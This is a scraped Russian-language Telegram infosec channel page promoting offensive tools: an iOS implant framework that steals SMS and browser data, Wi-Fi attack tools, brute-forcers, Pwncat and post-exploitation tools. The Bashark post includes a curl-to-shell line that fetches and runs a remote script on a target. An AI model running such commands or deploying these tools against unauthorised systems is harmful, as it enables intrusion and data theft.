Life-Hack - Хакер
63.7K subscribers
2.03K photos
91 videos
17 files
8.59K links
Сообщество по информационной безопасности (кибербезопасности).
Статьи, гайды, обучения, рекомендации, обзоры, новости, подборки полезного софта!

#linux #pentest #hack

Наши каналы - @LifeHackmedia

РКН: https://clck.ru/3GLmbM

По вопросам - @adm1nLH
Download Telegram
Anti-Debug Tricks

Эта энциклопедия содержит описание приемов антиотладки, которые работают в последних версиях Windows с помощью самых популярных отладчиков (таких как OllyDbg, WinDbg, x64dbg).

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
👍8🔥42
Дамы, с праздником, вас с нами мало, мы вас ценим!

LH | Новости | Курсы | Мемы
❤‍🔥6612👾4👍2
SeaShell Framework - новый инструмент для эксплуатации iOS

SeaShell Framework - это платформа для последующей эксплуатации iOS, которая позволяет вам получать удаленный доступ к устройству, управлять им и извлекать конфиденциальную информацию.

Основные особенности:

— Генератор IPA - Генерирует файлы IPA, которые можно установить на целевое устройство через TrollStore или другой установщик IPA, обходящий CoreTrust.
— Мощный имплантат - SeaShell использует продвинутую полезную нагрузку под названием Pwny, которую можно дополнить своими собственными модулями или плагинами.
— Базовый набор модулей - SeaShell идет с рядом модулей, которые могут извлекать пользовательские данные, включая SMS, голосовую почту, историю Safari и многое другое.
— Зашифрованная связь - Вся коммуникация между устройством и SeaShell шифруется с использованием TLS 1.3.
— Регулярные обновления - SeaShell активно поддерживается и регулярно обновляется.

Поддерживается широкий спектр версий iOS, поскольку все они уязвимы для ошибки CoreTrust. Это может быть iOS 14, 15, 16 или ранняя версия 17. SeaShell была только что выпущена и сейчас находится в стадии бета версии.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
👍22🔥71
🔑Default Credentials Cheat Sheet

Репозиторий, где собрано огромное количество стандартных комбинаций логин/пароль, используемых на множестве устройств и сервисов.

P.S. Полезно как для проверки безопасности, так и для атакующей команды.

Ссылка на GitHub

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
Please open Telegram to view this post
VIEW IN TELEGRAM
👍315🔥3😈3
Шесть лучших инструментов для работы с прокси

1. Bloody-Proxy-Scraper - Простой инструмент для получения хороших и проверенных прокси.

2. Lunus BPS - Инструмент для получения прокси и проверки их валидности в режиме реального времени. Поддерживает HTTP/s, SOCKS4, и SOCKS5.

3. Free-proxy - Еще одна софтина на bash, работает под termux.

4. free-proxy-list - Список валидных прокси, который часто обнавляется.

5. Valid8Proxy - Инструмент, разработанный для извлечения, проверки и хранения работающих прокси.

6. ProxyKot - Быстрый поиск прокси. Поддерживает HTTP/s и SOCKS.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
🔥15👍116🫡1
Начало Aircrack-ng и WEF

#статья

Думаю не секрет, что довольно многие начинали свой путь в ИБ с вопроса "Как взломать Wi-Fi соседа?", а дальше углублялись в эту тему и находили что-то намного интересней чем просто бесплатный интернет.

В этой статье вы познакомитесь с Aircrack-ng и ещё одним удобным инструментом вардрайвинга - WEF (WiFi Exploitation Framework). Так же мы разберем все базовые атаки на беспроводные точки доступа.

Ссылка на статью

LH | Новости | Курсы | Мемы
🔥20👍7😈5
Pwncat — это мощный и гибкий инструмент для работы с оболочками, объединивший все лучшие качества классического Netcat и дополнивший их уникальными функциями.

- Pwncat обеспечивает удобное управление удалёнными оболочками.

- Этот инструмент способен автоматически обходить защиту Firewall, IDS/IPS.

- Pwncat предоставляет инструментарий для автоматического повышения привилегий.

- Он обладает высокой степенью настраиваемости, что позволяет адаптировать инструмент под индивидуальные потребности каждого пользователя.

- Pwncat предлагает методы установки постоянного соединения с удалёнными оболочками, позволяет создать "неубиваемый шелл".

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
👍16🔥53
Грубая сила. Брутим RDP, SSH, VNC, Instagram и стандартные формы веб-аутентификации

#статья

Часто при проведении тестирования применяется брутфорс или, другими словами, метод "грубой силы". С помощью этой атаки взломщики могут получить несанкционированный доступ к административной панели веб-сайта, учетной записи пользователя или другой вид доступа с помощью различных протоколов.

В этой статье мы разберём инструмент для брутфорса - Crowbar и ещё два полезных брутфорсера для более узконаправленных задач.

Приятного чтения!

LH | Новости | Курсы | Мемы
🔥12👍116😁1👻1
На первой неделе курса "Linux для новичков" мы познакомились с основами операционной системы Linux.

Мы узнали, что такое Linux, почему его выбирают и какие основные дистрибутивы существуют. Мы изучили различия способов установки Linux, а также освоили основные команды командной строки и познакомились со структурой файловой системы Linux.

Эти знания и навыки являются фундаментом для дальнейшего изучения Linux и помогут нам успешно преодолевать дальнейшие вызовы курса. Если вы что-то пропустили и желаете прочитать, то вот список материалов первой недели:

Неделя 1: Введение в Linux
Что такое Linux и почему его выбирают?
Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
Структура файловой системы Linux: /bin, /etc, /home и др.
Пакетный менеджер APT для установки и обновления программ.
Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!

Следующую неделю мы посвятим теме «Работа с файлами и директориями».

#Linux #обучениеlinux #статьипоLinux

LH | Новости | Курсы | Мемы
👍45🔥107😈2
⭐️Курс «Kubernetes»

Данный курс охватывает аспекты Kubernetes, начиная с основ и пошагового создания локальных и облачных кластеров на разных платформах до подробного изучения ключевых компонентов и управления ими. Включает практические занятия по настройке Kubernetes, работы с Docker, созданию и использованию Helm Charts, а также изучение основных объектов Kubernetes.

Смотреть курс

LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍6😈2
Amnesiac и Bashark: Два инструмента пост-эксплуатации для Windows и Linux.

Amnesiac - это инструмент для пост-эксплуатации Windows, предназначенный для упрощения горизонтального перемещения в средах Windows. Разработанный на PowerShell, Amnesiac работает в памяти, что позволяет избежать установки и, таким образом, снижает риск обнаружения.

Этот инструмент передает команды через именованные каналы, имеет интуитивно понятный интерфейс и оснащен разнообразными модулями, упрощающими процесс тестирования.

P.S. Возможность выполнения из памяти, хоть и снижает риски быть обнаруженным, но не исключат их. Неплохая альтернатива инструментов для пост-эксплуатации, которые нужно загружать на целевую систему.

Bashark: Инструмент пост-эксплуатации для Linux

Bashark предназначен специально для операционных систем Linux и предлагает обширный набор функций, делая его полезным для специалистов по кибербезопасности.

Благодаря Bashark, вам будет проще выполнять разнообразные задачи, связанные с эксплуатацией системы, включая сбор информации, управление процессами и файлами и многое другое.

P.S. Инструмент является bash-скриптом, что дает возможность запуска без загрузки на целевую ОС и избавляет от необходимости загружать зависимости.
curl -L http://example.com/bashark.sh | sh


LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
👍19🔥62😈2